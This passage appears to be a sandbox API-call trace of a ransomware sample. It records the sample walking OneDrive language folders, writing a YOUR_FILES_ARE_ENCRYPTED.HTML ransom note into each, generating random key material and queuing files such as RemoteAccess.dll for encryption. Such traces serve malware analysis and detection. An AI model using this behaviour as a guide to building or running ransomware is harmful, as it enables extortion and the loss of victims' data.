pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.159] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.159] lstrlenW (lpString=".mui") returned 4 [0113.159] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.159] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ad15e9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68ad15e9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6902ec5e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.159] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.159] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.159] GetProcessHeap () returned 0x600000 [0113.159] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\quz-pe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.160] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.161] CloseHandle (hObject=0x32c) returned 1 [0113.161] GetProcessHeap () returned 0x600000 [0113.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.161] GetProcessHeap () returned 0x600000 [0113.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.161] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51aa9ab3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51aa9ab3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5456dd0b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xa0ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="RemoteAccess.dll", cAlternateFileName="REMOTE~1.DLL")) returned 1 [0113.161] StrStrIW (lpFirst="RemoteAccess.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.161] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll") returned 92 [0113.161] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0113.161] lstrlenW (lpString=".dll") returned 4 [0113.161] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0113.161] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\remoteaccess.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.162] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=659136) returned 1 [0113.162] GetProcessHeap () returned 0x600000 [0113.162] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.163] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="4F") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="41") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DA") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="59") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E7") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F2") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="58") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="D9") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="B2") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C7") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="CC") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="0A") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0F") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="3A") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="92") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="BA") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="7F") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="60") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="20") returned 2 [0113.163] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="4F") returned 2 [0113.164] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0F") returned 2 [0113.164] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D0") returned 2 [0113.164] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="EA") returned 2 [0113.164] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="53") returned 2 [0113.164] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E7") returned 2 [0113.164] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="26") returned 2 [0113.164] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="69") returned 2 [0113.164] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="04") returned 2 [0113.164] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="59") returned 2 [0113.164] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="BE") returned 2 [0113.164] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="D5") returned 2 [0113.164] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="3E") returned 2 [0113.164] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll" [0113.164] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.164] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.164] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6928c707, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6928c707, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6928c707, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ro", cAlternateFileName="")) returned 1 [0113.164] StrStrIW (lpFirst="ro", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.164] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro") returned 78 [0113.164] GetProcessHeap () returned 0x600000 [0113.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.166] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro" [0113.166] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro\\*" [0113.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6928c707, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6928c707, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x694c8d43, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.166] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6928c707, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6928c707, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x694c8d43, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="..", cAlternateFileName="")) returned 1 [0113.166] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x694c8d43, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x694c8d43, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x69b573d0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.166] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.166] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.166] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.166] lstrlenW (lpString=".mui") returned 4 [0113.166] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.166] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x694c8d43, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x694c8d43, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x69b573d0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.166] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.167] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.167] GetProcessHeap () returned 0x600000 [0113.167] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ro\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.167] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.168] CloseHandle (hObject=0x324) returned 1 [0113.168] GetProcessHeap () returned 0x600000 [0113.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.168] GetProcessHeap () returned 0x600000 [0113.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.169] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69b573d0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69b573d0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x69b573d0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ru", cAlternateFileName="")) returned 1 [0113.169] StrStrIW (lpFirst="ru", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.169] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru") returned 78 [0113.169] GetProcessHeap () returned 0x600000 [0113.169] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.171] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru" [0113.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru\\*" [0113.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69b573d0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69b573d0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6a811240, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.171] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69b573d0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69b573d0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6a811240, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="..", cAlternateFileName="")) returned 1 [0113.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a811240, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6a811240, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6acfbf1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.172] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.172] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.172] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.172] lstrlenW (lpString=".mui") returned 4 [0113.172] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a811240, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6a811240, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6acfbf1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.172] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.173] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.173] GetProcessHeap () returned 0x600000 [0113.173] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.174] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.174] CloseHandle (hObject=0x324) returned 1 [0113.175] GetProcessHeap () returned 0x600000 [0113.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.175] GetProcessHeap () returned 0x600000 [0113.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.175] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aeebefe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6aeebefe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6aeebefe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="rw", cAlternateFileName="")) returned 1 [0113.175] StrStrIW (lpFirst="rw", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.175] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw") returned 78 [0113.175] GetProcessHeap () returned 0x600000 [0113.175] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.175] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw" [0113.175] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw\\*" [0113.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aeebefe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6aeebefe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b2cbc78, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName=".", cAlternateFileName="")) returned 0x626778 [0113.175] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aeebefe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6aeebefe, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b2cbc78, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="..", cAlternateFileName="")) returned 1 [0113.175] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b2cbc78, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6b2cbc78, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b71df77, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.175] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.175] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.175] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.175] lstrlenW (lpString=".mui") returned 4 [0113.175] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.175] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b2cbc78, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6b2cbc78, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b71df77, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffc1a231, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.175] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0113.175] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 